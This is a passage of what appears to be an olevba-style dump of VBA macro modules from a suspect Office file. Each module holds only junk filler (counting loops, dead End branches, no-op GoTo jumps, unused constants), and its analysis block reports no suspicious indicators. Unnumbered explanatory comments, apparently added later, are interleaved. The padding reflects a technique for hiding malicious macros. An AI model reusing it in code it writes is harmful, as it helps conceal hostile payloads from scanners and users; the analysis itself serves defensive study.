  750. ENAnTQZqCU = "2268":
  751.  
  752. GoTo AGoWAaFRoD
  753. AGoWAaFRoD:
  754.  
  755. End Function
  756.  
  757. Public Function brueiDsqqpSLOranNVQrnAoEDtOYTovBSSllZ()
  758.  
  759. GoTo LamvbvURaZ
  760. LamvbvURaZ:
  761.  
  762. Dim ChkioXxIin As Integer
  763. ChkioXxIin = 1:
  764. Do While ChkioXxIin < 21
  765.    DoEvents: ChkioXxIin = ChkioXxIin + 1
  766. Loop
  767.  
  768. GoTo mcGptOEbCB
  769. mcGptOEbCB:
  770.  
  771. Dim WsWlyrzbcy As Integer
  772. WsWlyrzbcy = 1:
  773. Do While WsWlyrzbcy < 22
  774.    DoEvents: WsWlyrzbcy = WsWlyrzbcy + 1
  775. Loop
  776.  
  777. Dim FZjeAHMddX As Long
  778. FZjeAHMddX = "8268":
  779.  
  780. If "PVcTbuwjdc" = "ziHsdpsqwY" Then End
  781.  
  782. End Function
  783.  
  784. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  785. ANALYSIS:
  786. No suspicious keyword or IOC found.
  787. -------------------------------------------------------------------------------
  788. VBA MACRO Module2.bas
  789. in file: Rem_8392TN.xml - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module2'
  790. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  791. Private Function fGTxESCRdmSmLIRpbTYbZfnOyzeQHVdtwgkFV()
  792.  
  793. Dim HLncVDFgCo As Long
  794. HLncVDFgCo = "5898":
  795.  
  796. Dim kicNIdkpHH As Long
  797. kicNIdkpHH = "1398":
  798.  
  799. If "HsyGwFYANh" = "GDMkWHTWUA" Then End
  800.  
  801. GoTo UuZEbqYhrB
  802. UuZEbqYhrB:
  803.  
  804. Dim TJnnNpIeIX As Long
  805. TJnnNpIeIX = "5651":
  806.  
  807. Dim lNokXeaTjL As Integer
  808. lNokXeaTjL = 1:
  809. Do While lNokXeaTjL < 14
  810.    DoEvents: lNokXeaTjL = lNokXeaTjL + 1
  811. Loop
  812.  
  813. Dim YiPiCpaAOF As Long
  814. YiPiCpaAOF = "9154":
  815.  
  816. If "iviOLuTEPb" = "xvbKrCWamK" Then End
  817.  
  818. End Function
  819.  
  820. Private Sub MNdNQUoeJjiLwAdsZyHJKGsaWofgqFhOmEkXX()
  821.  
  822. If "wGvhqdRwtc" = "UfxcfEjSzd" Then End
  823.  
  824. Dim JuSghYBkPj As Integer
  825. JuSghYBkPj = 8:
  826. Do While JuSghYBkPj < 6
  827.    DoEvents: JuSghYBkPj = JuSghYBkPj + 1
  828. Loop
  829.  
  830. If "wZrVygUtbw" = "YUgVKJAueA" Then End
  831.  
  832. GoTo ChZySsGKqe
  833. ChZySsGKqe:
  834.  
  835. Dim QZFZxuEcOf As Integer
  836. QZFZxuEcOf = 5:
  837. Do While QZFZxuEcOf < 9
  838.    DoEvents: QZFZxuEcOf = QZFZxuEcOf + 1
  839. Loop
  840.  
  841. If "aBlmRDtIQG" = "jTXrhFfeHL" Then End
  842.  
  843. Dim PcVDFgCoDs As Long
  844. PcVDFgCoDs = "8147":
  845.  
  846. Dim cNIdkpHHat As Long
  847. cNIdkpHHat = "3146":
  848.  
  849. End Sub
  850.  
  851. Private Function GMTKslnBuTQZxjUgjhnPWHImrPEluFolgWBBa()
  852.  
  853. GoTo IXdDlNokXe
  854. IXdDlNokXe:
  855.  
  856. GoTo TjLVjlsYiP
  857. TjLVjlsYiP:
  858.  
  859. GoTo CpaAOFngiv
  860. CpaAOFngiv:
  861.  
  862. GoTo OLuTEPbxvb
  863. OLuTEPbxvb:
  864.  
  865. If "rCWamKyzpA" = "cgbRvWVxJm" Then End
  866.  
  867. GoTo fMltvwsFmJ
  868. fMltvwsFmJ:
  869.  
  870. Dim TdrUBZqxKK As Long
  871. TdrUBZqxKK = "5153":
  872.  
  873. Dim IwGvhqdRwt As Integer
  874. IwGvhqdRwt = 1:
  875. Do While IwGvhqdRwt < 26
  876.    DoEvents: IwGvhqdRwt = IwGvhqdRwt + 1
  877. Loop
  878.  
  879. End Function
  880.  
  881. Private Sub TLQTRXfNqrWIfUVloYcwmkkKMFIMUhHPKlhti()
  882.  
  883. GoTo eAvChZySsG
  884. eAvChZySsG:
  885.  
  886. Dim qeoEQZFZxu As Long
  887. qeoEQZFZxu = "8022":
  888.  
  889. GoTo OfLOMSaBlm
  890. OfLOMSaBlm:
  891.  
  892. Dim DtIQGjTXrh As Long
  893. DtIQGjTXrh = "6529":
  894.  
  895. GoTo eHLncVDFgC
  896. eHLncVDFgC:
  897.  
  898. GoTo DskicNIdkp
  899. DskicNIdkp:
  900.  
  901. Dim HatHsyGwFY As Integer
  902. HatHsyGwFY = 1:
  903. Do While HatHsyGwFY < 9
  904.    DoEvents: HatHsyGwFY = HatHsyGwFY + 1
  905. Loop
  906.  
  907. If "GDMkWHTWUA" = "bJUuZEbqYh" Then End
  908.  
  909. End Sub
  910.  
  911. Private Function FolgWBBaDVrVkRqyaCxKrOGXYiwZGLvcWPDOn()
  912.  
  913. Dim giviOLuTEP As Integer
  914. giviOLuTEP = 3:
  915. Do While giviOLuTEP < 6
  916.    DoEvents: giviOLuTEP = giviOLuTEP + 1
  917. Loop
  918.  
  919. Dim bKrCWamKyz As Long
  920. bKrCWamKyz = "6521":
  921.  
  922. If "cgbRvWVxJm" = "QfMltvwsFm" Then End
  923.  
  924. Dim BSTdrUBZqx As Long
  925. BSTdrUBZqx = "3405":
  926.  
  927. If "xCIwGvhqdR" = "wtcUfxcfEj" Then End
  928.  
  929. Dim zdEJuSghYB As Integer
  930. zdEJuSghYB = 9:
  931. Do While zdEJuSghYB < 24
  932.    DoEvents: zdEJuSghYB = zdEJuSghYB + 1
  933. Loop
  934.  
  935. If "zXXwZrVygU" = "tbwYUgVKJA" Then End
  936.  
  937. GoTo AvChZySsGK
  938. AvChZySsGK:
  939.  
  940. End Function
  941.  
  942. Public Function ESCRdmSmLIRpbTYbZfnOyzeQHVdtwgkFVssSu()
  943.  
  944. If "PcVDFgCoDs" = "kicNIdkpHH" Then End
  945.  
  946. If "HsyGwFYANh" = "GDMkWHTWUA" Then End
  947.  
  948. GoTo yTJnnNpIeI
  949. yTJnnNpIeI:
  950.  
  951. If "dDlNokXeaT" = "jLVjlsYiPi" Then End
  952.  
  953. If "aAOFngiviO" = "LuTEPbxvbK" Then End
  954.  
  955. If "CWamKyzpAc" = "gbRvWVxJmQ" Then End
  956.  
  957. If "MltvwsFmJB" = "STdrUBZqxK" Then End
  958.  
  959. Dim SzdEJuSghY As Integer
  960. SzdEJuSghY = 2:
  961. Do While SzdEJuSghY < 14
  962.    DoEvents: SzdEJuSghY = SzdEJuSghY + 1
  963. Loop
  964.  
  965. End Function
  966.  
  967. Private Sub cwmkkKMFIMUhHPKlhtixwnISNipuMMfGTxESC()
  968.  
  969. GoTo ZxuEcOfLOM
  970. ZxuEcOfLOM:
  971.  
  972. If "aBlmRDtIQG" = "jTXrhFfeHL" Then End
  973.  
  974. Dim atHsyGwFYA As Long
  975. atHsyGwFYA = "2770":
  976.  
  977. GoTo rByTJnnNpI
  978. rByTJnnNpI:
  979.  
  980. Dim aTjLVjlsYi As Long
  981. aTjLVjlsYi = "6019":
  982.  
  983. Dim iOLuTEPbxv As Integer
  984. iOLuTEPbxv = 4:
  985. Do While iOLuTEPbxv < 24
  986.    DoEvents: iOLuTEPbxv = iOLuTEPbxv + 1
  987. Loop
  988.  
  989. GoTo KKxCIwGvhq
  990. KKxCIwGvhq:
  991.  
  992. Dim RwtcUfxcfE As Long
  993. RwtcUfxcfE = "5274":
  994.  
  995. End Sub
  996.  
  997. Private Function fNqrWIfUVloYcwmkkKMFIMUhHPKlhtixwnISN()
  998.  
  999. Dim ZySsGKqeoE As Long
  1000. ZySsGKqeoE = "3029":
  1001.  
  1002. GoTo SaBlmRDtIQ
  1003. SaBlmRDtIQ:
  1004.  
  1005. Dim ncVDFgCoDs As Integer
  1006. ncVDFgCoDs = 8:
  1007. Do While ncVDFgCoDs < 13
  1008.    DoEvents: ncVDFgCoDs = ncVDFgCoDs + 1
  1009. Loop
  1010.  
  1011. Dim IdkpHHatHs As Integer
  1012. IdkpHHatHs = 7:
  1013. Do While IdkpHHatHs < 13
  1014.    DoEvents: IdkpHHatHs = IdkpHHatHs + 1
  1015. Loop
  1016.  
  1017. Dim FYANhGDMkW As Integer
  1018. FYANhGDMkW = 1:
  1019. Do While FYANhGDMkW < 15
  1020.    DoEvents: FYANhGDMkW = FYANhGDMkW + 1
  1021. Loop
  1022.  
  1023. Dim UAbJUuZEbq As Integer
  1024. UAbJUuZEbq = 8:
  1025. Do While UAbJUuZEbq < 19
  1026.    DoEvents: UAbJUuZEbq = UAbJUuZEbq + 1
  1027. Loop
  1028.  
  1029. GoTo ByTJnnNpIe
  1030. ByTJnnNpIe:
  1031.  
  1032. GoTo XdDlNokXea
  1033. XdDlNokXea:
  1034.  
  1035. End Function
  1036.  
  1037. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  1038. ANALYSIS:
  1039. No suspicious keyword or IOC found.
  1040. -------------------------------------------------------------------------------
  1041. VBA MACRO Module3.bas
  1042. in file: Rem_8392TN.xml - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module3'
  1043. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  1044. Private Function oDfMRCicVJUthYHACPChenmxiuRPudkVPUGdS()
        ' Filler routine, like every routine in Module3: it only declares locals,
        ' runs a short DoEvents counting loop, compares two different string
        ' literals (so the End branch is never taken), jumps to the label on the
        ' next line and stores a constant in a local that is never read.
        ' It returns nothing and calls no API, object or other routine.
  1045.  
  1046. Dim ZDxnSsrUfJ As Integer
  1047. ZDxnSsrUfJ = 2:
  1048. Do While ZDxnSsrUfJ < 3
  1049.    DoEvents: ZDxnSsrUfJ = ZDxnSsrUfJ + 1
  1050. Loop
  1051.  
  1052. If "IQSTPbJfxo" = "pAOqxvNtgg" Then End
  1053.  
  1054. GoTo yescSENAnT
  1055. yescSENAnT:
  1056.  
  1057. Dim ZqCUZCAGoW As Long
  1058. ZqCUZCAGoW = "1147":
  1059.  
  1060. End Function
  1061.  
  1062. Private Sub xcOlabrueiDsqqpSLOranNVQrnAoEDtOYTovB()
        ' Filler: the first loop starts at 9 with the bound 7 and is never entered;
        ' the second only counts from 1 to 28 with DoEvents. No other calls.
  1063.  
  1064. Dim ocgNBLamvb As Integer
  1065. ocgNBLamvb = 9:
  1066. Do While ocgNBLamvb < 7
  1067.    DoEvents: ocgNBLamvb = ocgNBLamvb + 1
  1068. Loop
  1069.  
  1070. GoTo ZKChkioXxI
  1071. ZKChkioXxI:
  1072.  
  1073. If "nzQemcGptO" = "EbCBdWsWly" Then End
  1074.  
  1075. Dim zbcyLlHFZj As Integer
  1076. zbcyLlHFZj = 1:
  1077. Do While zbcyLlHFZj < 28
  1078.    DoEvents: zbcyLlHFZj = zbcyLlHFZj + 1
  1079. Loop
  1080.  
  1081. End Sub
  1082.  
  1083. Private Function EJaatNBMSZQyrtgBZWfEpampntVcNOsxVjrBL()
        ' Filler: two never-true literal comparisons, one no-op GoTo and one
        ' DoEvents counting loop (10 to 17). No return value is assigned.
  1084.  
  1085. If "KKjMeBetAo" = "jLHtBXPGhr" Then End
  1086.  
  1087. GoTo IPuFlFyMXw
  1088. IPuFlFyMXw:
  1089.  
  1090. Dim KDFSFkhRpa As Integer
  1091. KDFSFkhRpa = 10:
  1092. Do While KDFSFkhRpa < 17
  1093.    DoEvents: KDFSFkhRpa = KDFSFkhRpa + 1
  1094. Loop
  1095.  
  1096. If "SYgnysXJGV" = "WMWZDxnSsr" Then End
  1097.  
  1098. End Function
  1099.  
  1100. Private Function RDGjyfFNoQMYGculmwLnUsKqddRVCpzPbKXkQ()
        ' Filler: same pattern as the routines above (no-op GoTo, dead End
        ' branches, one DoEvents counting loop from 3 to 14).
  1101.  
  1102. GoTo CUZCAGoWAa
  1103. CUZCAGoWAa:
  1104.  
  1105. If "oDEuxHLGWt" = "tTvORVDqQY" Then End
  1106.  
  1107. Dim qDrgfwRBwr As Integer
  1108. qDrgfwRBwr = 3:
  1109. Do While qDrgfwRBwr < 14
  1110.    DoEvents: qDrgfwRBwr = qDrgfwRBwr + 1
  1111. Loop
  1112.  
  1113. If "VoocgNBLam" = "vbvURaZKCh" Then End
  1114.  
  1115. End Function
  1116.  
  1117. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  1118. ANALYSIS:
  1119. No suspicious keyword or IOC found.
  1120. -------------------------------------------------------------------------------
  1121. VBA MACRO Module4.bas
  1122. in file: Rem_8392TN.xml - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module4'
  1123. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  1124. Private Function kuCVoCNmBRATVIVBxHfqCOKIOWEoiNyWLMcmP()
        ' Filler: the only statement stores the string "7864" in a Long local
        ' (VBA converts it to a number) that is never read. Nothing is returned.
  1125.  
  1126. Dim NnmPaEhXdD As Long
  1127. NnmPaEhXdD = "7864":
  1128.  
  1129. End Function
  1130.  
  1131. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  1132. ANALYSIS:
  1133. No suspicious keyword or IOC found.
  1134. -------------------------------------------------------------------------------
  1135. VBA MACRO Module5.bas
  1136. in file: Rem_8392TN.xml - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module5'
  1137. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  1138. Private Sub zDmqLByyYBTpTivowYzvIwMECWgbwEJaatNBM()
        ' Filler: the only statement stores the string "8519" in a Long local
        ' (VBA converts it to a number) that is never read.
  1139.  
  1140. Dim buwjdcziHs As Long
  1141. buwjdcziHs = "8519":
  1142.  
  1143. End Sub
  1144.  
  1145. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  1146. ANALYSIS:
  1147. No suspicious keyword or IOC found.
  1148. -------------------------------------------------------------------------------
  1149. VBA MACRO Module6.bas
  1150. in file: Rem_8392TN.xml - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module6'
  1151. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  1152. Private Function SZQyrtgBZWfEpampntVcNOsxVjrBLurmcHHgJ()
        ' Filler routine, like every routine in Module6: locals, DoEvents counting
        ' loops, GoTo jumps to the label on the next line and constants stored in
        ' locals that are never read. No API, object or other routine is called.
        ' Here the first loop (6 < 6) is never entered.
  1153.  
  1154. GoTo SyYGIjFrZv
  1155. SyYGIjFrZv:
  1156.  
  1157. Dim fQEgnsDKdw As Integer
  1158. fQEgnsDKdw = 6:
  1159. Do While fQEgnsDKdw < 6
  1160.    DoEvents: fQEgnsDKdw = fQEgnsDKdw + 1
  1161. Loop
  1162.  
  1163. Dim JbbdqdJGPn As Long
  1164. JbbdqdJGPn = "5222":
  1165.  
  1166. Dim wsqWeMXqvH As Integer
  1167. wsqWeMXqvH = 8:
  1168. Do While wsqWeMXqvH < 16
  1169.    DoEvents: wsqWeMXqvH = wsqWeMXqvH + 1
  1170. Loop
  1171.  
  1172. GoTo kuxbWMqqQs
  1173. kuxbWMqqQs:
  1174.  
  1175. GoTo hLAggoQrnA
  1176. hLAggoQrnA:
  1177.  
  1178. End Function
  1179.  
  1180. Private Sub GculmwLnUsKqddRVCpzPbKXkQNWnyqWZXDlTw()
        ' Filler: the first loop (1 < 1) is never entered, the three literal
        ' comparisons are between different strings so End is never reached,
        ' and the last loop only counts from 2 to 29 with DoEvents.
  1181.  
  1182. GoTo NbcTWfjeUS
  1183. NbcTWfjeUS:
  1184.  
  1185. Dim RtMpTbPowr As Integer
  1186. RtMpTbPowr = 1:
  1187. Do While RtMpTbPowr < 1
  1188.    DoEvents: RtMpTbPowr = RtMpTbPowr + 1
  1189. Loop
  1190.  
  1191. If "pFEVpkQXCt" = "tNNaFlzJZL" Then End
  1192.  
  1193. If "UspyXiaGJH" = "mVvgHMxODk" Then End
  1194.  
  1195. If "OSmcAazCuR" = "ujXQYeXjYn" Then End
  1196.  
  1197. Dim DxIDyfkCbv As Integer
  1198. DxIDyfkCbv = 2:
  1199. Do While DxIDyfkCbv < 29
  1200.    DoEvents: DxIDyfkCbv = DxIDyfkCbv + 1
  1201. Loop
  1202.  
  1203. End Sub
  1204.  
  1205. Public Sub MSZQyrtgBZWfEpampntVcNOsxVjrBLurmcHHg()
        ' Filler, but declared Public, so other modules can call it; no caller is
        ' visible in this part of the listing. The body only stores three
        ' constants in unused Long locals.
  1206.  
  1207. GoTo nefQEgnsDK
  1208. nefQEgnsDK:
  1209.  
  1210. Dim wkvVJbbdqd As Long
  1211. wkvVJbbdqd = "6334":
  1212.  
  1213. If "PnZKwsqWeM" = "XqvHetukux" Then End
  1214.  
  1215. Dim WMqqQsEhLA As Long
  1216. WMqqQsEhLA = "8220":
  1217.  
  1218. GoTo oQrnAhEWNO
  1219. oQrnAhEWNO:
  1220.  
  1221. Dim mPvUlSFFsX As Long
  1222. mPvUlSFFsX = "6710":
  1223.  
  1224. End Sub
  1225.  
  1226. Public Function pzPbKXkQNWnyqWZXDlTwxcOlabrueiDsqqpSL()
        ' Filler, declared Public. Four counting loops (the one starting at 5 with
        ' the bound 2 is never entered), one dead End branch and one unused
        ' constant. No return value is assigned.
  1227.  
  1228. Dim PowrToBpFE As Integer
  1229. PowrToBpFE = 1:
  1230. Do While PowrToBpFE < 6
  1231.    DoEvents: PowrToBpFE = PowrToBpFE + 1
  1232. Loop
  1233.  
  1234. Dim uQXCttNNaF As Integer
  1235. uQXCttNNaF = 8:
  1236. Do While uQXCttNNaF < 22
  1237.    DoEvents: uQXCttNNaF = uQXCttNNaF + 1
  1238. Loop
  1239.  
  1240. Dim ZLUAUspyXi As Long
  1241. ZLUAUspyXi = "1337":
  1242.  
  1243. If "JHmVvgHMxO" = "DkBEOSmcAa" Then End
  1244.  
  1245. Dim CuRujXQYeX As Integer
  1246. CuRujXQYeX = 5:
  1247. Do While CuRujXQYeX < 2
  1248.    DoEvents: CuRujXQYeX = CuRujXQYeX + 1
  1249. Loop
  1250.  
  1251. Dim fDxIDyfkCb As Integer
  1252. fDxIDyfkCb = 3:
  1253. Do While fDxIDyfkCb < 16
  1254.    DoEvents: fDxIDyfkCb = fDxIDyfkCb + 1
  1255. Loop
  1256.  
  1257. End Function
  1258.  
  1259. Private Function BMSZQyrtgBZWfEpampntVcNOsxVjrBLurmcHH()
        ' Filler: four constants stored in unused Long locals, one DoEvents
        ' counting loop (5 to 19) and one dead End branch.
  1260.  
  1261. Dim ZDSyYGIjFr As Long
  1262. ZDSyYGIjFr = "8466":
  1263.  
  1264. Dim dwkvVJbbdq As Integer
  1265. dwkvVJbbdq = 5:
  1266. Do While dwkvVJbbdq < 19
  1267.    DoEvents: dwkvVJbbdq = dwkvVJbbdq + 1
  1268. Loop
  1269.  
  1270. Dim bWMqqQsEhL As Long
  1271. bWMqqQsEhL = "8843":
  1272.  
  1273. Dim goQrnAhEWN As Long
  1274. goQrnAhEWN = "2337":
  1275.  
  1276. Dim DRBqclylrO As Long
  1277. DRBqclylrO = "2721":
  1278.  
  1279. If "aSxayeNuYZ" = "dpNbcTWfje" Then End
  1280.  
  1281. End Function
  1282.  
  1283. Private Sub sqqpSLOranNVQrnAoEDtOYTovBSSllZdKxIXj()
        ' Filler: two dead End branches, one unused constant, one DoEvents
        ' counting loop (8 to 10) and two no-op GoTo jumps.
  1284.  
  1285. If "spyXiaGJHm" = "VvgHMxODkB" Then End
  1286.  
  1287. Dim voCNtarATV As Long
  1288. voCNtarATV = "4335":
  1289.  
  1290. Dim YHfRbORPVw As Integer
  1291. YHfRbORPVw = 8:
  1292. Do While YHfRbORPVw < 10
  1293.    DoEvents: YHfRbORPVw = YHfRbORPVw + 1
  1294. Loop
  1295.  
  1296. GoTo UZwLTcmWTO
  1297. UZwLTcmWTO:
  1298.  
  1299. If "IihKcZDSyY" = "GIjFrZvnef" Then End
  1300.  
  1301. GoTo EgnsDKdwkv
  1302. EgnsDKdwkv:
  1303.  
  1304. End Sub
  1305.  
  1306. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  1307. ANALYSIS:
  1308. No suspicious keyword or IOC found.
  1309. -------------------------------------------------------------------------------
  1310. VBA MACRO Module8.bas
  1311. in file: Rem_8392TN.xml - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module8'
  1312. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  1313. Public Sub XMNdNQUoeJjiLwAdsZyHJKGsaWofgqFhOmEkX()
        ' Filler routine, like every routine in Module8: locals, DoEvents counting
        ' loops, comparisons of two different string literals guarding End, GoTo
        ' jumps to the label on the next line and constants stored in unused
        ' locals. No API, object or other routine is called anywhere in the module.
        ' This one is declared Public; no caller is visible in this part of the
        ' listing.
  1314.  
  1315. Dim IwGvhqdRwt As Integer
  1316. IwGvhqdRwt = 1:
  1317. Do While IwGvhqdRwt < 26
  1318.    DoEvents: IwGvhqdRwt = IwGvhqdRwt + 1
  1319. Loop
  1320.  
  1321. Dim xcfEjSzdEJ As Long
  1322. xcfEjSzdEJ = "2523":
  1323.  
  1324. If "ghYBkPjzXX" = "wZrVygUtbw" Then End
  1325.  
  1326. Dim UgVKJAueAv As Integer
  1327. UgVKJAueAv = 6:
  1328. Do While UgVKJAueAv < 28
  1329.    DoEvents: UgVKJAueAv = UgVKJAueAv + 1
  1330. Loop
  1331.  
  1332. Dim ySsGKqeoEQ As Integer
  1333. ySsGKqeoEQ = 10:
  1334. Do While ySsGKqeoEQ < 23
  1335.    DoEvents: ySsGKqeoEQ = ySsGKqeoEQ + 1
  1336. Loop
  1337.  
  1338. Dim xuEcOfLOMS As Integer
  1339. xuEcOfLOMS = 10:
  1340. Do While xuEcOfLOMS < 22
  1341.    DoEvents: xuEcOfLOMS = xuEcOfLOMS + 1
  1342. Loop
  1343.  
  1344. Dim mRDtIQGjTX As Integer
  1345. mRDtIQGjTX = 5:
  1346. Do While mRDtIQGjTX < 28
  1347.    DoEvents: mRDtIQGjTX = mRDtIQGjTX + 1
  1348. Loop
  1349.  
  1350. Dim feHLncVDFg As Long
  1351. feHLncVDFg = "3899":
  1352.  
  1353. Dim DskicNIdkp As Integer
  1354. DskicNIdkp = 10:
  1355. Do While DskicNIdkp < 28
  1356.    DoEvents: DskicNIdkp = DskicNIdkp + 1
  1357. Loop
  1358.  
  1359. End Sub
  1360.  
  1361. Private Function OHuGMTKslnBuTQZxjUgjhnPWHImrPEluFolgW()
        ' Filler: two DoEvents counting loops, four dead End branches and two
        ' unused constants. No return value is assigned.
  1362.  
  1363. Dim pIeIXdDlNo As Integer
  1364. pIeIXdDlNo = 5:
  1365. Do While pIeIXdDlNo < 16
  1366.    DoEvents: pIeIXdDlNo = pIeIXdDlNo + 1
  1367. Loop
  1368.  
  1369. GoTo aTjLVjlsYi
  1370. aTjLVjlsYi:
  1371.  
  1372. If "iCpaAOFngi" = "viOLuTEPbx" Then End
  1373.  
  1374. Dim bKrCWamKyz As Long
  1375. bKrCWamKyz = "6521":
  1376.  
  1377. If "cgbRvWVxJm" = "QfMltvwsFm" Then End
  1378.  
  1379. Dim BSTdrUBZqx As Long
  1380. BSTdrUBZqx = "3405":
  1381.  
  1382. If "xCIwGvhqdR" = "wtcUfxcfEj" Then End
  1383.  
  1384. Dim zdEJuSghYB As Integer
  1385. zdEJuSghYB = 9:
  1386. Do While zdEJuSghYB < 24
  1387.    DoEvents: zdEJuSghYB = zdEJuSghYB + 1
  1388. Loop
  1389.  
  1390. If "zXXwZrVygU" = "tbwYUgVKJA" Then End
  1391.  
  1392. End Function
  1393.  
  1394. Private Sub ISNipuMMfGTxESCRdmSmLIRpbTYbZfnOyzeQH()
        ' Filler: three unused constants, one dead End branch, one DoEvents
        ' counting loop (5 to 22) and four no-op GoTo jumps.
  1395.  
  1396. Dim jTXrhFfeHL As Long
  1397. jTXrhFfeHL = "5576":
  1398.  
  1399. If "DFgCoDskic" = "NIdkpHHatH" Then End
  1400.  
  1401. Dim GwFYANhGDM As Long
  1402. GwFYANhGDM = "7273":
  1403.  
  1404. Dim HTWUAbJUuZ As Integer
  1405. HTWUAbJUuZ = 5:
  1406. Do While HTWUAbJUuZ < 22
  1407.    DoEvents: HTWUAbJUuZ = HTWUAbJUuZ + 1
  1408. Loop
  1409.  
  1410. GoTo YhrByTJnnN
  1411. YhrByTJnnN:
  1412.  
  1413. GoTo IeIXdDlNok
  1414. IeIXdDlNok:
  1415.  
  1416. GoTo eaTjLVjlsY
  1417. eaTjLVjlsY:
  1418.  
  1419. Dim vbKrCWamKy As Long
  1420. vbKrCWamKy = "9276":
  1421.  
  1422. GoTo JBSTdrUBZq
  1423. JBSTdrUBZq:
  1424.  
  1425. End Sub
  1426.  
  1427. Public Function kXXLPvjtJVEReKHQhTLQTRXfNqrWIfUVloYcw()
        ' Filler, declared Public: three dead End branches, two DoEvents counting
        ' loops and two unused constants. No return value is assigned.
  1428.  
  1429. If "wZrVygUtbw" = "YUgVKJAueA" Then End
  1430.  
  1431. GoTo ChZySsGKqe
  1432. ChZySsGKqe:
  1433.  
  1434. Dim QZFZxuEcOf As Integer
  1435. QZFZxuEcOf = 5:
  1436. Do While QZFZxuEcOf < 9
  1437.    DoEvents: QZFZxuEcOf = QZFZxuEcOf + 1
  1438. Loop
  1439.  
  1440. If "aBlmRDtIQG" = "jTXrhFfeHL" Then End
  1441.  
  1442. Dim PcVDFgCoDs As Long
  1443. PcVDFgCoDs = "8147":
  1444.  
  1445. Dim cNIdkpHHat As Long
  1446. cNIdkpHHat = "3146":
  1447.  
  1448. Dim yGwFYANhGD As Integer
  1449. yGwFYANhGD = 9:
  1450. Do While yGwFYANhGD < 23
  1451.    DoEvents: yGwFYANhGD = yGwFYANhGD + 1
  1452. Loop
  1453.  
  1454. If "HTWUAbJUuZ" = "EbqYhrByTJ" Then End
  1455.  
  1456. GoTo nNpIeIXdDl
  1457. nNpIeIXdDl:
  1458.  
  1459. End Function
  1460.  
  1461. Private Sub aCxKrOGXYiwZGLvcWPDOnbSBtvJWCyIgrcPLJ()
        ' Filler: the loop starting at 8 with the bound 6 is never entered; the
        ' last loop only counts from 4 to 29 with DoEvents.
  1462.  
  1463. GoTo CWamKyzpAc
  1464. CWamKyzpAc:
  1465.  
  1466. GoTo bRvWVxJmQf
  1467. bRvWVxJmQf:
  1468.  
  1469. If "ltvwsFmJBS" = "TdrUBZqxKK" Then End
  1470.  
  1471. Dim CIwGvhqdRw As Long
  1472. CIwGvhqdRw = "7156":
  1473.  
  1474. GoTo UfxcfEjSzd
  1475. UfxcfEjSzd:
  1476.  
  1477. Dim JuSghYBkPj As Integer
  1478. JuSghYBkPj = 8:
  1479. Do While JuSghYBkPj < 6
  1480.    DoEvents: JuSghYBkPj = JuSghYBkPj + 1
  1481. Loop
  1482.  
  1483. If "wZrVygUtbw" = "YUgVKJAueA" Then End
  1484.  
  1485. GoTo oEQZFZxuEc
  1486. oEQZFZxuEc:
  1487.  
  1488. Dim OMSaBlmRDt As Integer
  1489. OMSaBlmRDt = 4:
  1490. Do While OMSaBlmRDt < 29
  1491.    DoEvents: OMSaBlmRDt = OMSaBlmRDt + 1
  1492. Loop
  1493.  
  1494. End Sub
  1495.  
  1496. Private Function twgkFVssSuNjNcpiqStpCqGxvQavRxDUUOHuG()
        ' Filler: three DoEvents counting loops, five no-op GoTo jumps and one
        ' unused constant. No return value is assigned.
  1497.  
  1498. Dim FYANhGDMkW As Integer
  1499. FYANhGDMkW = 1:
  1500. Do While FYANhGDMkW < 15
  1501.    DoEvents: FYANhGDMkW = FYANhGDMkW + 1
  1502. Loop
  1503.  
  1504. Dim UAbJUuZEbq As Integer
  1505. UAbJUuZEbq = 8:
  1506. Do While UAbJUuZEbq < 19
  1507.    DoEvents: UAbJUuZEbq = UAbJUuZEbq + 1
  1508. Loop
  1509.  
  1510. GoTo ByTJnnNpIe
  1511. ByTJnnNpIe:
  1512.  
  1513. GoTo XdDlNokXea
  1514. XdDlNokXea:
  1515.  
  1516. Dim jLVjlsYiPi As Integer
  1517. jLVjlsYiPi = 2:
  1518. Do While jLVjlsYiPi < 20
  1519.    DoEvents: jLVjlsYiPi = jLVjlsYiPi + 1
  1520. Loop
  1521.  
  1522. GoTo AOFngiviOL
  1523. AOFngiviOL:
  1524.  
  1525. GoTo EPbxvbKrCW
  1526. EPbxvbKrCW:
  1527.  
  1528. GoTo mKyzpAcgbR
  1529. mKyzpAcgbR:
  1530.  
  1531. Dim WVxJmQfMlt As Long
  1532. WVxJmQfMlt = "2151":
  1533.  
  1534. End Function
  1535.  
  1536. Public Function KGsaWofgqFhOmEkXXLPvjtJVEReKHQhTLQTRX()
        ' Filler, declared Public: two DoEvents counting loops, four no-op GoTo
        ' jumps, one dead End branch and two unused constants.
  1537.  
  1538. Dim ueAvChZySs As Integer
  1539. ueAvChZySs = 6:
  1540. Do While ueAvChZySs < 14
  1541.    DoEvents: ueAvChZySs = ueAvChZySs + 1
  1542. Loop
  1543.  
  1544. Dim eoEQZFZxuE As Long
  1545. eoEQZFZxuE = "6270":
  1546.  
  1547. GoTo fLOMSaBlmR
  1548. fLOMSaBlmR:
  1549.  
  1550. GoTo tIQGjTXrhF
  1551. tIQGjTXrhF:
  1552.  
  1553. Dim eHLncVDFgC As Integer
  1554. eHLncVDFgC = 3:
  1555. Do While eHLncVDFgC < 7
  1556.    DoEvents: eHLncVDFgC = eHLncVDFgC + 1
  1557. Loop
  1558.  
  1559. GoTo kicNIdkpHH
